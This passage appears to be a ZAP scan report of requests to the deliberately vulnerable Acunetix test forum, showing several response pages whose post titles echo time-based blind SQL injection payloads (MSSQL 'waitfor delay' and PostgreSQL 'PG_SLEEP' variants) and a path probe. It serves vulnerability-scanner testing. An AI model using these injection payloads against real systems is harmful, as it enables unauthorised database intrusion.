SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=47 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=47 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=47 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3136 |
Response Body - size: 3,136 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 1 waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D47" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/1 waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>1 waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=48 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3163 |
Response Body - size: 3,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum UGrs47CJ'; waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/UGrs47CJ'; waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>UGrs47CJ'; waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=49 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3166 |
Response Body - size: 3,166 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum KHr20UMM'); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/KHr20UMM'); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:55 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>KHr20UMM'); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 415 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:48 GMT Content-Length: 3071 |
Response Body - size: 3,071 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:50 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>showforum.asp/.</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=50 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3169 |
Response Body - size: 3,169 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum NebDWBkM')); waitfor delay '0:0:15' -- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/NebDWBkM')); waitfor delay '0:0:15' -- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>NebDWBkM')); waitfor delay '0:0:15' -- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=51 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3199 |
Response Body - size: 3,199 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:56 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>qGJSWg8I' OR 242=(SELECT 242 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=52 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3202 |
Response Body - size: 3,202 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>APAYP3xi') OR 682=(SELECT 682 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=53 |
Method | POST |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 417 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Content-Length: 21 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:54 GMT Content-Length: 3205 |
Response Body - size: 3,205 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:57 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>ybrxNQKO')) OR 343=(SELECT 343 FROM PG_SLEEP(15))-- - 104.156.249.56</div><div class='posttext'>555</div></td></tr> </table> <!-- 